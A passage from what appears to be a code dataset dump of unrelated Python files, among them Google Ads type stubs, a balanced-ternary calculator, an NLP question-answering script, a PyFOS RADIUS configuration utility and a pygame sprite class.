AudienceExclusionDimension(proto.Message):\n exclusions: MutableSequence[ExclusionSegment]\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n exclusions: MutableSequence[ExclusionSegment] = ...\n ) -> None: ...\n\nclass AudienceSegment(proto.Message):\n user_list: UserListSegment\n user_interest: UserInterestSegment\n life_event: LifeEventSegment\n detailed_demographic: DetailedDemographicSegment\n custom_audience: CustomAudienceSegment\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n user_list: UserListSegment = ...,\n user_interest: UserInterestSegment = ...,\n life_event: LifeEventSegment = ...,\n detailed_demographic: DetailedDemographicSegment = ...,\n custom_audience: CustomAudienceSegment = ...\n ) -> None: ...\n\nclass AudienceSegmentDimension(proto.Message):\n segments: MutableSequence[AudienceSegment]\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n segments: MutableSequence[AudienceSegment] = ...\n ) -> None: ...\n\nclass CustomAudienceSegment(proto.Message):\n custom_audience: str\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n custom_audience: str = ...\n ) -> None: ...\n\nclass DetailedDemographicSegment(proto.Message):\n detailed_demographic: str\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n detailed_demographic: str = ...\n ) -> None: ...\n\nclass ExclusionSegment(proto.Message):\n user_list: UserListSegment\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n user_list: UserListSegment = ...\n ) -> None: ...\n\nclass GenderDimension(proto.Message):\n genders: MutableSequence[GenderTypeEnum.GenderType]\n include_undetermined: bool\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n genders: MutableSequence[GenderTypeEnum.GenderType] = ...,\n include_undetermined: bool = ...\n ) -> None: ...\n\nclass HouseholdIncomeDimension(proto.Message):\n income_ranges: MutableSequence[IncomeRangeTypeEnum.IncomeRangeType]\n include_undetermined: bool\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n income_ranges: MutableSequence[IncomeRangeTypeEnum.IncomeRangeType] = ...,\n include_undetermined: bool = ...\n ) -> None: ...\n\nclass LifeEventSegment(proto.Message):\n life_event: str\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n life_event: str = ...\n ) -> None: ...\n\nclass ParentalStatusDimension(proto.Message):\n parental_statuses: MutableSequence[ParentalStatusTypeEnum.ParentalStatusType]\n include_undetermined: bool\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n parental_statuses: MutableSequence[\n ParentalStatusTypeEnum.ParentalStatusType\n ] = ...,\n include_undetermined: bool = ...\n ) -> None: ...\n\nclass UserInterestSegment(proto.Message):\n user_interest_category: str\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n user_interest_category: str = ...\n ) -> None: ...\n\nclass UserListSegment(proto.Message):\n user_list: str\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n user_list: str = ...\n ) -> None: 
...\n","sub_path":"google-stubs/ads/googleads/v12/common/types/audiences.pyi","file_name":"audiences.pyi","file_ext":"pyi","file_size_in_byte":5511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"248708227","text":"memory = 0\ndef add(bt):\n global memory\n memory += bt_to_int(bt)\ndef subtract(bt):\n global memory\n memory -= bt_to_int(bt)\ndef multiply(bt):\n global memory\n memory *= bt_to_int(bt)\ndef divide(bt):\n global memory\n if bt_to_int(bt) == 0:\n raise ZeroDivisionError('bt can not be 0 when memory devided by bt!\\n')\n else:\n memory //= bt_to_int(bt) \ndef remainder(bt):\n global memory\n if bt_to_int(bt) == 0:\n raise ZeroDivisionError('bt can not be 0 when calculate the remainder!\\n')\n else:\n memory %= bt_to_int(bt)\ndef negate():\n global memory\n memory *= -1\ndef store(bt):\n global memory\n memory = bt_to_int(bt)\ndef bt_to_int(bt):\n dec = 0\n if bt == '':\n raise IndexError\n for i in range(1,len(bt)+1):\n if bt[-i] == 'N':\n dec += -1 * 3**(i-1)\n elif bt[-i] == '1':\n dec += 3**(i-1)\n elif bt[-i] == '0' or bt[-i] == ' ':\n pass\n else:\n raise Exception\n return dec\ndef int_to_bt(n):\n flag = 0\n bt = ''\n BT = ''\n if n >= 0:\n while(n//3):\n bt = str(n % 3) + bt\n n = n//3\n bt = str (n) + bt #0,1,2 to add into bt\n for i in range(1,len(bt)+1):\n \n if (int(bt[-i])+flag) == 2:\n BT = 'N' + BT\n flag = 1\n elif (int(bt[-i])+flag) == 1:\n BT = '1' + BT\n flag = 0\n elif (int(bt[-i])+flag) == 3:\n BT = '0' + BT\n flag = 1\n elif (int(bt[-i])+flag) == 0:\n BT = '0' + BT\n flag = 0\n if (flag): #the rest one to add the head of number\n BT = '1' + BT\n return BT\n else:\n bt = int_to_bt(-n)\n bt = bt.replace('N','T')\n bt = bt.replace('1','N')\n bt = bt.replace('T','1')\n return bt\ndef memory_as_int():\n global memory\n return memory\ndef memory_as_bt():\n global memory\n return int_to_bt(memory)\ndef detect_space(string):\n if ' ' in string:\n raise Exception\ndef evaluate(string):\n string = string.strip()\n global memory\n index = 0\n list1 = ['-', '+', '*', '/', '=', '%']\n dic = {'+':add, '-':subtract, '*':multiply, '/':divide, '%':remainder, '=':store}#may key typos happen\n #if string[0] not in list1:\n #and if string[-1] is digit[1,N,0] or space\n try:\n dic[string[0]]\n except KeyError as msg0:\n return 'The first character should be an operator, ' + string[0] + ' is not!\\n'\n except IndexError as msg4:\n return 'Input can not be nothing!\\n'\n for i in range(1,len(string)):\n \n if (string[i] in list1): #may have error inputs in the first character\n try:\n detect_space(string[index+1:i].strip())\n dic[string[index]](string[index+1:i].strip())\n index = i #if string[-1]='-'... 
\n except ZeroDivisionError as msg1:\n return msg1\n except IndexError as msg3:\n return string[i-1]+' cannot be followed by ' + string[i]\n except Exception:\n return 'Spaces cannot be placed in the middle of a number!\\n'\n else:\n try:\n bt_to_int(string[i])\n except Exception as msg2:\n return string[i] + ' is not defined in balanced ternary!\\n' \n try:\n detect_space(string[index+1:].strip())\n except Exception:\n return 'Spaces cannot be placed in the middle of a number!\\n'\n try: #bt_to_int raises here if string[-1] is an operator\n bt_to_int(string[-1])\n dic[string[index]](string[index+1:].strip())\n except ZeroDivisionError as msg1:\n return msg1\n except Exception as msg2:\n return string[-1] + ' should be followed by a number!\\n'\n return int_to_bt(memory)\ndef REPL():\n string = input('Please input the expression you want to calculate or just enter quit:')\n if string == 'quit':\n return \n else:\n print(evaluate(string))\n REPL()\n return \n\nif __name__ == '__main__':\n REPL() \n \n \n \n \n\n","sub_path":"CIT590_HW4_Balanced_Ternary/bt.py","file_name":"bt.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"606971927","text":"import numpy as np \nimport pandas as pd\nimport random\nimport sys\n\nw = np.zeros([163, 1])\n\ndef _test(f, result): #240 rows\n\tdata = np.genfromtxt(f, delimiter=',', encoding=\"latin1\")[:, 2:]\n\tdata = np.nan_to_num(data)\n\t#data = np.maximum(data, 0)\n\trow = data.shape[0]\n\tcol = data.shape[1]\n\tleft = 0\n\tright = 0\n\tfor i in range(row):\n\t\tfor j in range(col):\n\t\t\tif data[i, j] < 0:\n\t\t\t\tif j == 0 or j == col-1:\n\t\t\t\t\tdata[i, j] = 0\n\t\t\t\telse:\n\t\t\t\t\tleft = j-1\n\t\t\t\t\tright = j+1\n\t\t\t\t\twhile (data[i, left] < 0 and left>0):\n\t\t\t\t\t\tleft -= 1\n\t\t\t\t\twhile (data[i, right] < 0 and right < col-1):\n\t\t\t\t\t\tright += 1\n\t\t\t\t\t# interpolate linearly between the nearest valid neighbours\n\t\t\t\t\tdata[i, j] = ((data[i, left]*(right-j))+(data[i, right]*(j-left)))/(right-left)\n\tpredict = []\n\ttemp = []\n\n\tfor i in range(0, data.shape[0], 18): #predict\n\t\ttemp.append(data[i:i+18, :])\t\t\n\t\t#predict.append(y[0])\n\ttest_x = np.array(temp)\n\ttest_x = np.reshape(test_x, (240,162))\n\ttest_x = np.hstack((test_x, np.ones([240,1])))\n\ty = np.dot(test_x, w)\n\ty = np.reshape(y, (1,240))\n\tpredict = y.tolist()\n\tpredict = predict[0]\n\tid_li = [\"id_\"+str(i) for i in range(len(predict))]\n\n\tdataframe = pd.DataFrame({'id': id_li,'value': predict})\n\tdataframe.to_csv(result, index=False, sep=',')\n\t\t\n\nif __name__ == '__main__':\n\t\n w = np.load('w.npy')\n _test(sys.argv[1], sys.argv[2])","sub_path":"hw1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"65191308","text":"import logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass SmokeTestFail(Exception):\n pass\n\n\nclass SmokeTestRegistry(object):\n def __init__(self):\n self.tests = {}\n\n def register(self, sequence, name):\n def decorator(fn):\n self.tests[name] = {\"sequence\": sequence, \"test\": fn}\n return fn\n\n return decorator\n\n def __iter__(self):\n def seq(key):\n return self.tests[key][\"sequence\"]\n\n for name in sorted(self.tests, key=seq):\n yield name, self.tests[name][\"test\"]\n\n def execute(self):\n for name, test in iter(self):\n status = True\n message = \"\"\n try:\n test()\n except SmokeTestFail as fail:\n status = False\n message = str(fail)\n logger.info(\"SMOKETEST FAILURE - {}:
{}\".format(name, message))\n yield {\"name\": name, \"status\": status, \"message\": message}\n\n\nlive_smoketests = SmokeTestRegistry()\nready_smoketests = SmokeTestRegistry()\n","sub_path":"cla_frontend/apps/status/smoketests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"636101453","text":"from repomgr.models import Rom\n\n\nclass Dump:\n def __init__(self, uuid: str, name: str, zipfile: str, roms: [Rom] = list()):\n self.uuid: str = uuid\n self.name: str = name\n self.zip: str = zipfile\n self.roms: [Rom] = roms\n\n @property\n def size(self) -> int:\n acc: int = 0\n for rom in self.roms:\n acc += rom.size\n return acc\n\n def __str__(self):\n return str(self.as_dict())\n\n def as_dict(self) -> dict:\n roms: [dict] = []\n for rom in self.roms:\n roms.append(rom.as_dict())\n\n dct: dict = {}\n dct.update({'uuid': self.uuid})\n dct.update({'name': self.name})\n dct.update({'zip': self.zip})\n dct.update({'roms': roms})\n return dct\n","sub_path":"repomgr/models/dump.py","file_name":"dump.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"52258032","text":"import io\nimport json\nimport os\nimport requests\nimport xml.etree.ElementTree\nimport time\nimport sys\nimport zipfile\nimport shutil\nfrom shutil import copy2\nimport collections\nimport re\n\n\nclass CheckConditions:\n @classmethod\n def checkUploadedModel(cls, file_path=\"\", folder_path=\"\"):\n '''\n Check that the uploaded model .zip file contains all necessary \n files and folder\n '''\n\n if not file_path.endswith(\".zip\"):\n return {\"KO\", \"The uploaded file is not a .zip file\"}\n \n # unzip file\n zip_ref = zipfile.ZipFile(file_path, 'r') \n zip_ref.extractall(folder_path)\n zip_ref.close() \n\n basename = os.path.basename(str(file_path))\n filename_noext = os.path.splitext(basename)\n opt_folder = os.path.join(folder_path, filename_noext[0]) \n if not os.path.exists(opt_folder):\n return {\"KO\", \"The unzipped folder has not the same name as the \\\n .zip file. Please upload a well formatted .zip\"}\n else:\n # check that all folders exist\n folder_list = [\"checkpoints\", \"config\", \"figures\", \"mechanisms\", \\\n \"model\", \"morphology\", \"tools\", \"opt_neuron.py\", \\\n \"__init__.py\"]\n for f in folder_list:\n if not os.path.exists(os.path.join(opt_folder, f)):\n return {\"response\":\"KO\", \"message\":\"Folder/file '\" + f + \"' does not exist in the \\\n optimization folder. Please upload a well formatted \\\n .zip file\"}\n\n # validate json files in config folder\n jsonfile_list = [\"features.json\", \"morph.json\", \"parameters.json\", \\\n \"protocols.json\"]\n keys = []\n for i,j in enumerate(jsonfile_list):\n c_filename = os.path.join(opt_folder, \"config\", j)\n try:\n with open(c_filename, \"r\") as read_file:\n json_data = json.load(read_file)\n keys.append(json_data.keys()[0])\n read_file.close()\n except ValueError as error:\n return {\"response\":\"KO\", \"message\":\"File '\" + c_filename + \"' is either not \\\n present or not readable in 'config' folder. Please \\\n check your .zip file\"}\n all_keys = list(set(keys))\n if len(all_keys) != 1:\n return {\"response\":\"KO\", \"message\":\"All .json files in the\\\n 'config' folder must contain the same data key. 
\\\n Please upload a well formatted .zip file\"}\n else:\n for line in open(os.path.join(opt_folder, \"opt_neuron.py\")):\n if line.startswith('evaluator = model.evaluator.create'):\n start = \"model.evaluator.create('\"\n end = \"', \"\n opt_key = line[line.find(start)+len(start):line.rfind(end)]\n if opt_key != all_keys[0]:\n return {\"response\":\"KO\", \"message\":\"Line 75 in 'opt_neuron.py' \\\n must contain the same key as the one \\\n contained in the .json files in the \\\n 'config' folder. Please upload a well \\\n formatted .zip file\"}\n\n # validate files in folder mechanisms \n file_list = os.listdir(os.path.join(opt_folder, \"mechanisms\"))\n modfilelist = [x for x in file_list if x[-4:]==\".mod\"]\n if not file_list or len(file_list) != len(modfilelist):\n return {\"response\":\"KO\", \"message\":\"The folder 'mechanisms' \\\n must not be empty and must contain only .mod files\"}\n\n\n # validate files in folder 'model'\n file_list = ['__init__.py', 'analysis.py', 'evaluator.py', 'template.py']\n for f in file_list:\n if not os.path.exists(os.path.join(opt_folder, \"model\", f)):\n return {\"response\":\"KO\", \"message\":\"File '\" + f + \"' does not exist in the \\\n 'model' folder. Please upload a well formatted \\\n .zip file\"}\n\n # validate files in folder 'tools'\n file_list = ['get_stats.py', 'task_stats.py']\n for f in file_list:\n if not os.path.exists(os.path.join(opt_folder, \"tools\", f)):\n return {\"response\":\"KO\", \"message\":\"File '\" + f + \"' does not exist in the \\\n 'tools' folder. Please upload a well formatted \\\n .zip file\"}\n\n # check that only one file is present in morphology\n morph_list_dir = os.listdir(os.path.join(opt_folder, \"morphology\"))\n if len(morph_list_dir) != 1:\n return {\"response\":\"KO\", \"message\":\"Folder 'morphology' must \\\n contain only one file. \" + str(len(morph_list_dir)) + \\\n \"files are present in the folder. Please upload a well formatted \\\n .zip file\"}\n else:\n with open(os.path.join(opt_folder, \"config\", \"morph.json\")) as json_file:\n morph_data = json.load(json_file)\n if morph_list_dir[0] != morph_data.values()[0]: \n return {\"response\":\"KO\", \"message\":\"The file in the \\\n 'morphology' folder must have the same name\\\n of the key in the 'morph.json' file in the\\\n 'config' folder\"}\n \n # validate .mod files in mechanisms\n mechdir = os.listdir(os.path.join(opt_folder, \"mechanisms\"))\n modlist = [x for x in mechdir if x.endswith(\".mod\")]\n if not modlist:\n return {\"response\":\"KO\", \"message\":\"No .mod file in folder\\\n 'mechanisms'. Please check your .zip file\"}\n\n\n return {\"response\":\"OK\", \"message\":\"Folder exists\"}\n \n\n\n @classmethod\n def checkSimFolders(cls, folder_path=\"\"):\n\n if not os.path.isdir(folder_path):\n resp = {\"response\":\"KO\", \"message\": \"Optimization result \" + \\\n \"does not exist. 
Check your files\"}\n return resp\n #\n check_folder = os.path.join(folder_path, 'checkpoints')\n mec_folder = os.path.join(folder_path, 'mechanisms')\n morph_folder = os.path.join(folder_path, 'morphology')\n\n # check checkpoints folder\n if not os.path.isdir(check_folder):\n resp = {\"response\":\"KO\", \"message\":\"'checkpoints' folder \" + \\\n \"NOT present\"}\n return resp\n list_hoc_files = \\\n [cf for cf in os.listdir(check_folder) if cf.endswith(\".hoc\")]\n if not list_hoc_files:\n resp = {\"response\":\"KO\", \"message\":\"No .hoc file is present \\\n in the final simulation folder\"}\n return resp\n\n # check morphology folder\n if not os.path.isdir(morph_folder):\n resp = {\"response\":\"KO\", \"message\":\"'morphology' folder NOT present\"}\n return resp\n elif not os.listdir(morph_folder):\n resp = {\"response\":\"KO\", \"message\":\"The folder 'morphology' is \\\n empty\"}\n return resp\n \n # check mechanisms folder\n if not os.path.isdir(mec_folder):\n resp = {\"response\":\"KO\", \"message\":\"'mechanisms' folder NOT present\"}\n return resp\n else:\n mec_list_dir = os.listdir(mec_folder)\n list_mod = [i for i in mec_list_dir if i.endswith('.mod')] \n if not list_mod:\n resp = {\"response\":\"KO\", \"message\":\"The folder 'mechanisms'\\\n does NOT contain any .mod file'\"}\n return resp\n\n return {\"response\":\"OK\", \"message\":\"Folders and files structure are correct.\"}\n \n\n @classmethod\n def checkSimFiles(cls, sim_path=\"\"):\n sim_name = ''\n list_dir = os.listdir(sim_path) \n for i in list_dir:\n if i.endswith('.zip'):\n sim_name = os.path.splitext(i)[0]\n break\n if sim_name == \"\":\n resp = {\"response\":\"KO\", \"message\":\"NO simulation .zip file or NO \\\n correct output from optimization\"}\n return resp\n\n check_folder = os.path.join(sim_path, sim_name, 'checkpoints')\n mec_folder = os.path.join(sim_path, sim_name, 'mechanisms')\n morph_folder = os.path.join(sim_path, sim_name, 'morphology')\n\n if not os.path.isdir(check_folder):\n resp = {\"response\":\"KO\", \"message\":\"'checkpoints' folder NOT present\"}\n return resp\n \n if not os.path.isdir(morph_folder):\n resp = {\"response\":\"KO\", \"message\":\"'morphology' folder NOT present\"}\n return resp\n elif not os.listdir(morph_folder):\n resp = {\"response\":\"KO\", \"message\":\"The folder 'morphology' is \\\n empty\"}\n return resp\n \n if not os.path.isdir(mec_folder):\n resp = {\"response\":\"KO\", \"message\":\"'mechanisms' folder NOT present\"}\n return resp\n else:\n mec_list_dir = os.listdir(mec_folder)\n list_mod = [i for i in mec_list_dir if i.endswith('.mod')] \n if not list_mod:\n resp = {\"response\":\"KO\", \"message\":\"The folder 'mechanisms'\\\n does NOT contain any .mod file'\"}\n return resp\n \n if not os.path.isfile(os.path.join(check_folder, 'cell.hoc')) \\\n and not (os.path.isfile(os.path.join(sim_path, \\\n 'template.hoc'))):\n resp = {\"response\":\"KO\", \"message\":\"Neither 'cell.hoc' nor \\\n 'template.hoc' file present in the final simulation \\\n folder\"}\n return resp\n \n # if all conditions are met\n resp = {\"response\":\"OK\", \"message\":\"All needed files are present\"}\n return resp\n\nclass FetchFiles:\n @classmethod\n def fetchOptSetFile(cls, opt_set_file_path=\"\"):\n if os.path.isfile(opt_set_file_path):\n with open(opt_set_file_path) as pf:\n opt_set = json.load(pf)\n pf.close()\n opt_set_dict = {\n \"status\":\"OK\", \\\n \"hpc_sys\": opt_set[\"hpc_sys\"], \\\n \"gennum\": opt_set[\"number_of_generations\"], \\\n \"offsize\": 
opt_set[\"offspring_size\"], \\\n \"nodenum\": opt_set[\"number_of_nodes\"], \\\n \"corenum\": opt_set[\"number_of_cores\"], \\\n \"runtime\": opt_set[\"runtime\"], \\\n \"wf_id\": opt_set[\"wf_id\"], \\\n }\n else:\n opt_set_dict = {\"status\":\"KO\"}\n\n return opt_set_dict\n","sub_path":"hh_neuron_builder/tools/wf_file_manager.py","file_name":"wf_file_manager.py","file_ext":"py","file_size_in_byte":11175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"394274162","text":"import nltk\nfrom nltk.tokenize import RegexpTokenizer\nimport sys\nimport os\nimport string\nimport math\nfrom num2words import num2words\n\nFILE_MATCHES = 1\nSENTENCE_MATCHES = 1\n\n\ndef main():\n\n # Check command-line arguments\n if len(sys.argv) != 2:\n sys.exit(\"Usage: python questions.py corpus\")\n\n # Calculate IDF values across files\n files = load_files(sys.argv[1])\n file_words = {\n filename: tokenize(files[filename])\n for filename in files\n }\n file_idfs = compute_idfs(file_words)\n\n # Prompt user for query\n query = set(tokenize(input(\"Query: \")))\n\n # Determine top file matches according to TF-IDF\n filenames = top_files(query, file_words, file_idfs, n=FILE_MATCHES)\n\n # Extract sentences from top files\n sentences = dict()\n for filename in filenames:\n for passage in files[filename].split(\"\\n\"):\n for sentence in nltk.sent_tokenize(passage):\n tokens = tokenize(sentence)\n if tokens:\n sentences[sentence] = tokens\n\n # Compute IDF values across sentences\n idfs = compute_idfs(sentences)\n\n # Determine top sentence matches\n matches = top_sentences(query, sentences, idfs, n=SENTENCE_MATCHES)\n for match in matches:\n print(match)\n\n\ndef load_files(directory):\n \"\"\"\n Given a directory name, return a dictionary mapping the filename of each\n `.txt` file inside that directory to the file's contents as a string.\n \"\"\"\n files = dict()\n corpus_path = os.path.join(\".\", directory)\n corpus_files = os.listdir(corpus_path)\n\n # I'm assuming all are txt. 
If not, simple IF will do the filtering\n for txt in corpus_files:\n string_file = \"\"\n with open(os.path.join(corpus_path, txt)) as f:\n string_file = f.read()\n files[txt] = string_file\n\n return files\n\ndef tokenize(document):\n \"\"\"\n Given a document (represented as a string), return a list of all of the\n words in that document, in order.\n\n Process document by coverting all words to lowercase, and removing any\n punctuation or English stopwords.\n \"\"\"\n tokenizer = RegexpTokenizer(r'\\w+')\n stopwords = nltk.corpus.stopwords.words(\"english\")\n lemmatizer = nltk.wordnet.WordNetLemmatizer()\n stemmer = nltk.stem.SnowballStemmer('english')\n # Get lowercase and rid of apostrophes\n text = document.lower().replace(\"\\n\", \" \").replace(\"”\", \" \").replace(\"“\", \" \").replace(\" ’\", \" \").replace(\" ‘\", \" \")\n\n # Get rid of punctuation and uppercase\n tokens = tokenizer.tokenize(text)\n # Get rid of stopwords\n for word in tokens:\n if word in stopwords:\n tokens.remove(word)\n \n # Get rid of single characters\n for word in tokens:\n if len(word) < 2:\n tokens.remove(word)\n \n # Convert numbers to text [Not using it as it leaves phrases as words, should check]\n \"\"\"for word in tokens:\n if word.isnumeric():\n tokens[tokens.index(word)] = num2words(word)\"\"\"\n\n\n # Lemmatize words \n for word in tokens:\n tokens[tokens.index(word)] = lemmatizer.lemmatize(word)\n\n # Stem words\n for word in tokens:\n tokens[tokens.index(word)] = stemmer.stem(word)\n\n return tokens\n\n\ndef compute_idfs(documents):\n \"\"\"\n Given a dictionary of `documents` that maps names of documents to a list\n of words, return a dictionary that maps words to their IDF values.\n\n Any word that appears in at least one of the documents should be in the\n resulting dictionary.\n \"\"\"\n words = dict()\n for doc in documents:\n tokens = documents[doc]\n checked_words = set()\n for word in tokens:\n if word in checked_words:\n continue\n if word in words:\n words[word] += 1\n checked_words.add(word)\n else:\n words[word] = 1\n checked_words.add(word)\n for word in words:\n # idf(t) = log(NumberOfDocs/(DocsAppearing))\n words[word] = math.log(len(documents) / words[word])\n\n return words\n\n\ndef top_files(query, files, idfs, n):\n \"\"\"\n Given a `query` (a set of words), `files` (a dictionary mapping names of\n files to a list of their words), and `idfs` (a dictionary mapping words\n to their IDF values), return a list of the filenames of the the `n` top\n files that match the query, ranked according to tf-idf.\n \"\"\"\n # TF-IDF = NumberOfAppearencesInDocument * IDF_Value\n tf_idf = dict()\n for document in files:\n tf_idf[document] = 0\n tokens = files[document]\n for word in query:\n if idfs.get(word) is None:\n continue\n appeareances = 0\n for token in tokens:\n if word == token:\n appeareances += 1\n tf_idf[document] += (appeareances * idfs[word])\n\n tf_idf = sorted(tf_idf.items(), key=lambda x: x[1], reverse=True)\n result = list()\n for document in range (0, n):\n result.append(tf_idf[document][0])\n return result\n\n\ndef top_sentences(query, sentences, idfs, n):\n \"\"\"\n Given a `query` (a set of words), `sentences` (a dictionary mapping\n sentences to a list of their words), and `idfs` (a dictionary mapping words\n to their IDF values), return a list of the `n` top sentences that match\n the query, ranked according to idf. 
If there are ties, preference should\n be given to sentences that have a higher query term density.\n \"\"\"\n matches = dict()\n for sentence in sentences:\n match_counter = total_counter = idf_counter = 0\n idf_counted_words = set()\n for word in sentences[sentence]:\n total_counter += 1\n if word in query:\n match_counter += 1\n if word not in idf_counted_words:\n idf_counter += idfs[word]\n idf_counted_words.add(word)\n # We save idf count and density, in case its needed\n if idf_counter != 0 and match_counter/total_counter != 0:\n matches[sentence] = (idf_counter, match_counter / total_counter)\n\n matches = sorted(matches.items(), key=lambda x: x[1], reverse=True)\n result = list()\n for document in range (0, n):\n result.append(matches[document][0])\n return result\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"7_Language/questions/questions.py","file_name":"questions.py","file_ext":"py","file_size_in_byte":6359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"74766919","text":"#!/usr/bin/env python3\n\n# Copyright 2018 Brocade Communications Systems LLC. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may also obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\n\n:mod:`radius_server_set` - PyFOS util to modify a RADIUS server configuration.\n*******************************************************************************\nThe :mod:`radius_server_create` util supports modifying a RADIUS \\\nserver configuration.\n\nThis module is a stand-alone script and API that can be used to modify a\nRADIUS server configuration.\n\n* Input:\n\n| Infrastructure Options:\n\n| -i,--ipaddr=IPADDR The IP address of the FOS switch.\n| -L,--login=LOGIN The login name.\n| -P,--password=PASSWORD The password.\n| -f,--vfid=VFID The VFID to which the request \\\n is directed [OPTIONAL].\n| -s,--secured=MODE The HTTPS mode \"self\" or \"CA\" [OPTIONAL].\n| -v,--verbose Verbose mode [OPTIONAL].\n\n* Util Script Options:\n --server Sets the RADIUS server name or IP address.\n --port Sets the RADIUS server port number.\n --timeout Sets the RADIUS server timeout value.\n --authentication Sets the RADIUS server authentication type.\n --secret Sets the RADIUS server secret type.\n --encryption-type Sets the RADIUS server encryption type.\n --position Sets the RADIUS server position.\n\n* Output:\n * A success response or a dictionary in case of error.\n\n\"\"\"\n\nimport sys\nfrom pyfos import pyfos_auth\nfrom pyfos import pyfos_util\nfrom pyfos.pyfos_brocade_security import radius_server\nfrom pyfos.utils import brcd_util\n\n\ndef main(argv):\n filters = [\"server\", \"port\", \"timeout\", \"authentication\",\n \"secret\", \"encryption_type\", \"position\"]\n inputs = brcd_util.parse(argv, radius_server, filters)\n\n radius_obj = inputs['utilobject']\n\n if radius_obj.peek_server() is None:\n print(\"Missing command line options\")\n print(inputs['utilusage'])\n exit(1)\n\n if not (radius_obj.peek_port() or\n radius_obj.peek_timeout() or radius_obj.peek_authentication() or\n 
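Two details of `questions.py` above are worth isolating. First, its `tokenize()` loops call `tokens.remove(word)` while iterating over the same list, which skips the element after each removal; a comprehension avoids that. Second, `compute_idfs()` counts, per word, how many documents contain it and applies `idf = log(N / document_frequency)`. Both as a compact, illustrative sketch:

```python
import math
from collections import Counter

def filter_tokens(tokens, stopwords):
    # A comprehension avoids the skip-on-delete behaviour of mutating the
    # list being iterated, as the stopword/short-word loops above do.
    return [t for t in tokens if t not in stopwords and len(t) >= 2]

def compute_idfs(documents):
    # documents: dict mapping name -> list of tokens
    df = Counter()
    for tokens in documents.values():
        df.update(set(tokens))        # set(): each document counted at most once
    n = len(documents)
    return {w: math.log(n / c) for w, c in df.items()}

assert filter_tokens(["a", "the", "cat", "the", "dog"], {"the"}) == ["cat", "dog"]
assert compute_idfs({"d1": ["cat"], "d2": ["cat", "dog"]})["dog"] == math.log(2)
```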
radius_obj.peek_secret() or radius_obj.peek_encryption_type() or\n radius_obj.peek_position()):\n print(\"Missing command line options\")\n print(inputs['utilusage'])\n exit(1)\n\n # Login to switch\n session = brcd_util.getsession(inputs)\n\n result = radius_obj.patch(session)\n pyfos_util.response_print(result)\n\n # Log out\n pyfos_auth.logout(session)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"pyfos/utils/system_security/radius_server_set.py","file_name":"radius_server_set.py","file_ext":"py","file_size_in_byte":3079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"370481876","text":"import pygame\r\nimport math\r\n\r\nclass spear:\r\n def __init__(self, parent):\r\n self.image = pygame.image.load('spear.png')\r\n self.parent = parent\r\n self.rect = self.image.get_rect()\r\n self.inAttack = False\r\n self.attackStart = 0\r\n self.animationLength = 0.3 * 1000 # Milliseconds\r\n self.animationDistance = 10\r\n\r\n def draw(self, surface):\r\n posX = self.parent.x\r\n posY = self.parent.y\r\n\r\n # Adjust in a direction +90 degrees to the direction pointed at\r\n posX += math.sin(math.radians(self.parent.angle + 90)) * 80\r\n posY += math.cos(math.radians(self.parent.angle + 90)) * 80\r\n\r\n # Animation\r\n if self.inAttack:\r\n posX -= math.sin(math.radians(self.parent.angle)) * 60\r\n posY -= math.cos(math.radians(self.parent.angle)) * 60\r\n\r\n if self.inAttack:\r\n time = pygame.time.get_ticks() - self.attackStart\r\n if time >= self.animationLength:\r\n self.inAttack = False\r\n\r\n rotImage = pygame.transform.rotate(self.image, self.parent.angle)\r\n rotRect = rotImage.get_rect(center=self.parent.rect.center)\r\n surface.blit(rotImage, (posX + rotRect.x, posY + rotRect.y))\r\n\r\n def attack(self):\r\n if self.inAttack:\r\n return\r\n self.attackStart = pygame.time.get_ticks()\r\n self.inAttack = True","sub_path":"combatSystem/spear.py","file_name":"spear.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"123553008","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 